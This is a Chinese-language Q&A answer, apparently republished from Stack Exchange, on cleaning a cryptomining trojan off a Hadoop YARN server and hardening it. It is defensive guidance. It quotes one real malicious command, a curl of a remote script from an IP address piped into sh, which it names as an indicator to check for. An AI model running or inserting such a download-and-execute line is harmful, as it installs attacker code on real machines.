You need to enable JavaScript to run this app.
优惠活动
大模型
产品
解决方案
定价
更多

疑似YARN遭木马感染求助:重装系统仍存在异常CPU占用进程

结论:这是典型的挖矿木马感染

毫无疑问,你的服务器已经被植入了挖矿木马——从launch_container.sh被篡改执行外部恶意脚本、生成隐藏的高CPU占用进程这些行为来看,完全符合挖矿病毒的特征,而且重装系统后问题复现,说明感染源还没被彻底清除。

一、紧急止损:先终止恶意进程并清理临时文件

先把占满CPU的恶意进程杀掉,再删除相关恶意文件:

# 杀掉已发现的恶意进程
kill -9 7484 7496
# 批量清理所有/var/tmp/java相关进程(防止有漏网的)
ps -ef | grep "/var/tmp/java" | grep -v grep | awk '{print $2}' | xargs kill -9

然后删除恶意文件和被篡改的YARN缓存:

rm -rf /var/tmp/java /var/tmp/w.conf
# 清理YARN临时目录里的恶意缓存文件
rm -rf /home/ubuntu/hadoop/tmp/nm-local-dir/usercache/dr.who/appcache/

二、排查感染源(为什么重装系统还存在?)

你重装Ubuntu为CentOS后问题依旧,大概率是以下原因之一:

  • 共享存储带毒:比如Hadoop集群使用的HDFS、NFS共享存储,或者挂载的外部磁盘里已经有恶意文件,重装系统后挂载这些存储又被感染
  • 系统镜像被篡改:你用来重装CentOS的镜像本身就包含恶意程序,导致重装后直接带毒
  • 攻击者仍有远程访问权限:攻击者已经拿到服务器的SSH密钥、弱密码,或者通过其他漏洞获得权限,重装后再次远程植入木马
  • Hadoop配置被篡改:YARN的核心配置文件被恶意修改,导致每次启动都会生成带毒的launch_container.sh

三、彻底清理与系统加固步骤

1. 先断网隔离

断开服务器的网络连接,避免攻击者远程控制或重新植入木马,再进行后续清理。

2. 检查并重置Hadoop配置与脚本

  • 检查Hadoop安装目录下的所有启动脚本(尤其是YARN相关脚本),看是否被植入恶意代码,发现异常直接替换为官方原版脚本
  • 检查YARN核心配置文件yarn-site.xml,确认yarn.nodemanager.local-dirs、yarn.nodemanager.log-dirs等路径是否正常,有没有被指向陌生目录;如果配置被篡改,从Hadoop官方下载对应版本的配置模板重置
  • 清理HDFS上的可疑文件,避免集群内其他节点被感染

3. 系统层面全面排查

  • 检查定时任务:查看用户级定时任务crontab -l,以及系统级定时任务目录/etc/cron.d/、/etc/cron.hourly/、/etc/cron.daily/,删除任何陌生的定时任务(这类任务通常会定时下载恶意脚本)
  • 检查开机启动项:用systemctl list-unit-files --type=service查看所有开机服务,禁用陌生的可疑服务
  • 扫描系统病毒:安装ClamAV等开源杀毒软件,对系统全盘扫描,清理残留的恶意文件
  • 加固SSH访问:禁用密码登录,改用SSH密钥登录;限制允许登录SSH的IP范围;更换所有用户的SSH密钥对

4. 重置所有权限与密码

  • 重置服务器root密码、Hadoop相关用户的密码
  • 检查系统用户列表,删除陌生的可疑用户

四、验证清理效果

重启服务器后,做以下验证:

  1. 用ps -ef | grep java检查,确认没有/var/tmp/java这类陌生进程
  2. 启动YARN,查看临时目录下的launch_container.sh内容,确认没有curl 185.222.210.59/x_wcr.sh | sh这类恶意命令
  3. 监控CPU使用率,确认没有异常占满的情况

内容的提问来源于stack exchange,提问作者larry

相关产品推荐
方舟 Agent Plan

超全模态模型 × Harness 升级,最新支持 Deepseek-V4.1-Flash、GLM-5.3 系列、Doubao-Seedream-5.0-pro、Kimi-K3 (部分), 限时 9.9 元起

最近更新时间:2026.05.29 06:38:36